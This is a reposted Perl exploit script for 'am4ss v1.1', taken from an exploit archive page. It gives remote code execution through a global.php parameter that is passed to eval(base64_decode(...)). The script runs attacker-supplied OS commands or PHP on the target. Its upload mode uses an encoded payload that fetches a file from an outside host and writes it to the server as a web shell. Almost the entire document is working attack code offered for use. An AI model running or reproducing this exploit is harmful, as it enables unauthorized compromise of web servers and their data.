am4ss v1.1 Remote Code Execution

		当前位置：主页>安全文章>文章资料>Exploits>文章内容

am4ss v1.1 Remote Code Execution

来源：1337s.cc 作者：M4n 发布时间：2011-08-05

#!/usr/bin/perl -w
# Exploit Title: am4ss v1.1 Remote Code Execution
# Version: 1.1
# Author : Or4nG.M4n & i-Hmx < Dev Exploit
# Big Thnks 2 : i-Hmx , sA^Dev!L
# Big dicks to : Duck lamerz Team :))
# Tested on: Windows 8 
use MIME::Base64;
use LWP::UserAgent;
use LWP::Simple;
# About ..
print q(
   anti.virus.team | Or4nG.M4n | alm3refh.cOm Group
                      _      _       _          _      _   _
                     / \    | |     | |        / \    | | | |
                    / _ \   | |     | |       / _ \   | |_| |
                   / ___ \  | |___  | |___   / ___ \  |  _  |
   in the name of /_/   \_\ |_____| |_____| /_/   \_\ |_| |_|
   |  Sp Thnks 2 : sA^Dev!L , i-Hmx , h311 c0d3 , xSs m4n   |
   | Gr33tz : SarBoT511 , Dr.Silv3r , Demetre ,  Lagripe-Dz |
   |  Mr.DH , x-Sh4dow , Pir4t3 ,  b0x , SadhaCker , r00t3r |
   +--------------------------------------------------------+
   | Home :~# 1337s.cc , tryag.cc , sec4ever , r00t-s3c.com |
   +--------------------------------------------------------+
);

# start
if($ARGV[0] =~ "-cm"){ 
$a1 = $ARGV[1];
$a2 = $ARGV[2];
print "
Please select function to use [system , exec , shell_exec]
function# ";
$func =<STDIN>;
for($faris=0;$faris<1000;$faris++)
{
print "
Command# ";
$execut =<STDIN>;
$exec = $func."('".$execut."');";
$cmd = encode_base64($exec);
$ex = $a1 ."\x2F". $a2 ."global.php?fa=". $cmd ."&bn=eval(base64_decode(\$fa));;";
my $content = get $ex;
if(!$content){
}else{
print "\nExecuting cmd ..\n\n";
}
print  $content;
}
}
# End
#injection func
if($ARGV[0] =~ "-ev"){ 
$a1 = $ARGV[1];
$a2 = $ARGV[2];
print "Write PHP code to be executed on the remote site [ don't use <? or ?> ]
Example:phpinfo();";
print "
choose file to dump the results in (eg 1337s.htm)
File name# ";
$myf =<STDIN>;
for($faris=0;$faris<1000;$faris++)
{
print "Eval# ";
$evalcode =<STDIN>;
$evalencoded = encode_base64($evalcode);
$strike = $a1 ."\x2F". $a2 ."global.php?fa=". $evalencoded ."&bn=eval(base64_decode(\$fa));;";
my $content = get $strike;
if(!$content){
}else{
print "\nDumping Results\n\n";
}
open(lst,">>$myf\n");
print lst"$content\n";
close(lst);
}
}
#ended
if($ARGV[0] =~ "-up"){ 
$a1 = $ARGV[1];
$a2 = $ARGV[2];
$ex = $a1."\x2F".$a2."global.php?fa=JGZpbGUgPSBmb3Blbigib3I0bmcucGhwIiAsIncrIik7JHNhPWZpbGVfZ2V0X2NvbnRlbnRzKCJodHRwOi8vdHJhdjFhbi50MzUuY29tL3I1dC50eHQiKTskd3JpdGUgPSBmd3JpdGUgKCRmaWxlICwkc2EpOw==&bn=eval(base64_decode(\$fa));;";
my $content = get $ex;
print "Exploiter\n";
sleep(4);
print  "done .. > $a1 $a2 > or4ng.php < shell.php Enjoy";
}
if($ARGV[0] =~ ""){
print q(
   anti.virus.team | Or4nG.M4n
                            _      _       _          _      _   _
                           / \    | |     | |        / \    | | | |
                          / _ \   | |     | |       / _ \   | |_| |
                         / ___ \  | |___  | |___   / ___ \  |  _  |
   +-----in the name of /_/   \_\ |_____| |_____| /_/   \_\ |_| |_|
   | Upload Shell Use : perl am4ss.pl -up http://localhost/ Path/ |
   | Cmd By Functions : perl am4ss.pl -cm http://localhost/ Path/ |
   | Eval php code    : perl am4ss.pl -ev http://localhost/ Path/ |
   +--------------------------------------------------------------+
);
}
# Coded By Or4nG.M4n ..

[

推荐] [

评论(0条)] [返回顶部] [打印本页] [关闭窗口]

匿名评论

评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。

§最新评论：

热点文章

·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1

推荐广告